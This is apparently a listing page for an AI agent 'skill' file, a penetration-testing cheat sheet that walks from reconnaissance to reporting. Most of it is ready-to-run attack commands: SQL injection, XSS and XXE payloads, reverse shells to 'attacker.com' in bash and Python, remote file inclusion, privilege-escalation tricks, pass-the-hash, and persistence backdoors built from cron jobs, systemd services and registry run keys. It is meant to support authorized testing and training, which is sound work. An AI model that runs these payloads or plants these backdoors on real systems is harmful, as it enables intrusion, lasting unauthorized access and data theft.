Penetration testing
π Professional Multi-Agent Skills
npx -y skills add kinhluan/skills --skill penetration-testingAssembled from the repository path, not quoted from the project. Check it against their README if it does not work.
One thing to look at
- 2 stars2 stars. Stars are a popularity signal and not a quality one, but at this level it is likely that nobody has read this closely except its author, and you would be relying on your own review.
What its author says it does
Copied from the file, not written here
Offensive security, penetration testing, and vulnerability exploitation. Use when conducting security assessments, red team exercises, web application pentesting, network exploitation, or learning ethical hacking techniques. Covers PTES methodology, reconnaissance, exploitation, post-exploitation, and reporting.
SKILL.md
10.6 KB, ~3.1k tokens by cl100k_base, as published. Nobody here has run it
Penetration Testing
Offensive security skill for ethical hacking, vulnerability exploitation, and security assessment. Covers the full penetration testing lifecycle from reconnaissance to reporting.
"The best defense is a good offense." β Know your enemy to protect yourself.
π― When to Use
- Conducting security assessments or penetration tests
- Learning ethical hacking techniques
- Red team exercises
- Bug bounty hunting
- Vulnerability research and exploitation
- Security awareness training
πΊοΈ PTES Methodology Overview
Phase 1: Pre-Engagement Interactions
ββ Scope definition, rules of engagement, legal agreements
Phase 2: Intelligence Gathering (Reconnaissance)
ββ OSINT, passive/active recon, target enumeration
Phase 3: Threat Modeling
ββ Identify high-value targets, attack vectors
Phase 4: Vulnerability Analysis
ββ Automated scanning, manual verification
Phase 5: Exploitation
ββ Gain access, prove impact
Phase 6: Post-Exploitation
ββ Privilege escalation, lateral movement, persistence
Phase 7: Reporting
ββ Executive summary, technical findings, remediation
π Phase 2: Reconnaissance
Passive Reconnaissance (OSINT)
# Subdomain enumeration
subfinder -d example.com -o subdomains.txt
amass enum -d example.com -o amass.txt
assetfinder --subs-only example.com
# DNS enumeration
dnsrecon -d example.com -t axfr
dnsenum example.com
# WHOIS & metadata
whois example.com
theHarvester -d example.com -b all
# GitHub recon (secrets, credentials)
git-dumper https://github.com/org/repo ./repo
truffleHog --regex --entropy=False https://github.com/org/repo
# Google dorks
site:example.com filetype:pdf
site:example.com intitle:"index of"
intext:"password" site:example.com
Active Reconnaissance
# Port scanning
nmap -sS -sV -O -p- --top-ports 1000 target.com
nmap -sV --script=vuln target.com
# Service enumeration
nmap -sV -p 80,443,8080 --script=http-enum target.com
nmap -sV -p 21,22,23,25,53,80,110,143,443,3306,3389,5432,8080 target.com
# Web technology detection
whatweb target.com
wappalyzer target.com
# Directory/file brute-forcing
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -x php,txt,html
dirb http://target.com /usr/share/wordlists/dirb/common.txt
ffuf -u http://target.com/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
π¬ Phase 4: Vulnerability Analysis
Web Application Scanning
# Automated scanning
nikto -h http://target.com
zaproxy -cmd -quickurl http://target.com -quickout report.html
# CMS scanning
wpscan --url http://target.com --enumerate ap,at,cb,dbe
joomscan -u http://target.com
droopescan scan drupal -u http://target.com
# SSL/TLS testing
sslscan target.com
testssl.sh target.com
nmap --script ssl-enum-ciphers -p 443 target.com
Manual Verification
# Check for common misconfigurations
curl -I http://target.com/robots.txt
curl -I http://target.com/.git/config
curl -I http://target.com/.env
curl -I http://target.com/backup.zip
curl -I http://target.com/phpinfo.php
# HTTP methods testing
curl -X OPTIONS http://target.com -i
curl -X PUT http://target.com/test.txt -d "test"
# CORS misconfiguration
curl -H "Origin: https://evil.com" -I http://target.com
π₯ Phase 5: Exploitation
SQL Injection
# Detection
sqlmap -u "http://target.com/page.php?id=1" --batch --level=2
sqlmap -u "http://target.com/page.php?id=1" --dbs --batch
sqlmap -u "http://target.com/page.php?id=1" -D database --tables --batch
sqlmap -u "http://target.com/page.php?id=1" -D database -T users --dump --batch
# Manual testing
# Error-based
' OR 1=1 -- -
" OR 1=1 -- -
') OR ('1'='1
# Union-based
' UNION SELECT null,null,null -- -
' UNION SELECT username,password,null FROM users -- -
# Blind (time-based)
' OR SLEEP(5) -- -
' OR pg_sleep(5) -- -
Cross-Site Scripting (XSS)
<!-- Reflected XSS -->
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<!-- Stored XSS -->
"><script>alert('XSS')</script>
'--><script>alert('XSS')</script>
<!-- DOM-based XSS -->
#<img src=x onerror=alert('XSS')>
javascript:alert('XSS')
<!-- Polyglot -->
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
Command Injection
# Basic detection
target.com/page?cmd=whoami
target.com/page?cmd=$(whoami)
target.com/page?cmd=`whoami`
# Reverse shell (if command injection confirmed)
bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("attacker.com",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Server-Side Request Forgery (SSRF)
# Basic SSRF
curl http://target.com/fetch?url=http://169.254.169.254/latest/meta-data/
curl http://target.com/fetch?url=file:///etc/passwd
# Bypass filters
curl http://target.com/fetch?url=http://0177.0.0.1/
curl http://target.com/fetch?url=http://2130706433/
curl http://target.com/fetch?url=http://0x7f000001/
Local File Inclusion (LFI) / Remote File Inclusion (RFI)
# LFI
http://target.com/page?file=../../../etc/passwd
http://target.com/page?file=../../../../../../etc/passwd
http://target.com/page?file=php://filter/read=convert.base64-encode/resource=index.php
# RFI
http://target.com/page?file=http://attacker.com/shell.txt
XML External Entity (XXE)
<!-- Basic XXE -->
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>
<!-- OOB XXE -->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/xxe.dtd">
%xxe;
]>
<foo>&data;</foo>
π΄ Phase 6: Post-Exploitation
Privilege Escalation (Linux)
# Information gathering
id
whoami
uname -a
cat /etc/os-release
find / -perm -4000 -type f 2>/dev/null # SUID binaries
find / -perm -2000 -type f 2>/dev/null # SGID binaries
cat /etc/sudoers
crontab -l
# Common exploits
# Kernel exploits
uname -r # Check kernel version
searchsploit linux kernel $(uname -r)
# SUID exploitation
# If find has SUID: find . -exec /bin/sh -p \; -quit
# If vim has SUID: vim -c ':!/bin/sh'
# If less has SUID: less /etc/passwd -> !/bin/sh
# Sudo abuse
sudo -l
# If sudo allows specific commands without password
sudo -u#-1 /bin/bash # CVE-2019-14287
# Capabilities
capsh --print
getcap -r / 2>/dev/null
Privilege Escalation (Windows)
# Information gathering
whoami /all
systeminfo
net user
net localgroup administrators
Get-Process
Get-Service
# Common exploits
# Unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\Windows\\" | findstr /i /v """
# If path has spaces and no quotes: C:\Program Files\Vuln Service\service.exe
# Place payload at C:\Program.exe
# AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# If enabled: msiexec /quiet /qn /i C:\Users\Public\payload.msi
# Potato family exploits (NTLM relay)
# JuicyPotato, RoguePotato, SweetPotato
Lateral Movement
# Pass-the-hash (PTH)
pth-smbclient -U user%hash //target/share
pth-winexe -U user%hash //target cmd
# Pass-the-ticket (PTT)
# Extract ticket with Mimikatz, inject with Rubeus
# SSH key pivoting
# If you find private keys: ssh -i id_rsa user@target
# Port forwarding
ssh -L 8080:internal-target:80 user@pivot-host
ssh -D 1080 user@pivot-host # SOCKS proxy
Persistence
# Linux
# Add user
useradd -m -s /bin/bash backdoor
passwd backdoor
# SSH key
mkdir -p /root/.ssh
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys
# Cron job
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'" | crontab -
# Systemd service
cat > /etc/systemd/system/backdoor.service << EOF
[Unit]
Description=Backdoor
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'
Restart=always
[Install]
WantedBy=multi-user.target
EOF
systemctl enable backdoor
# Windows
# Registry run key
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\backdoor.exe" /f
# Scheduled task
schtasks /create /tn "Backdoor" /tr "C:\backdoor.exe" /sc minute /mo 1
# WMI persistence
# Use PowerShell Empire or Cobalt Strike for WMI events
π Phase 7: Reporting
Report Structure
1. Executive Summary
- Risk rating (Critical/High/Medium/Low)
- Business impact
- Key recommendations
2. Technical Findings
For each vulnerability:
- Title & Severity (CVSS v3.1)
- Description
- Proof of Concept (PoC)
- Impact
- Remediation
3. Appendices
- Tools used
- Scope & methodology
- Test timeline
CVSS v3.1 Scoring
| Severity | Score Range | Response Time |
|---|---|---|
| Critical | 9.0-10.0 | Immediate |
| High | 7.0-8.9 | 30 days |
| Medium | 4.0-6.9 | 60 days |
| Low | 0.1-3.9 | 90 days |
π οΈ Essential Tools
| Category | Tools |
|---|---|
| Recon | subfinder, amass, theHarvester, dnsrecon, whois |
| Scanning | nmap, masscan, rustscan |
| Web | Burp Suite, ZAP, nikto, gobuster, ffuf, sqlmap |
| Exploitation | Metasploit, Cobalt Strike, Sliver |
| Post-Exploitation | Mimikatz, Rubeus, BloodHound, SharpHound |
| Reporting | Dradis, Faraday, DefectDojo |
β οΈ Legal & Ethical Guidelines
- Always have written authorization before testing
- Never test systems you don't own or have permission to test
- Minimize impact on target systems
- Report findings responsibly
- Destroy all data collected after engagement
π References
What ships with it: 1 file
558 B alongside SKILL.md
- SKILL.toon558 B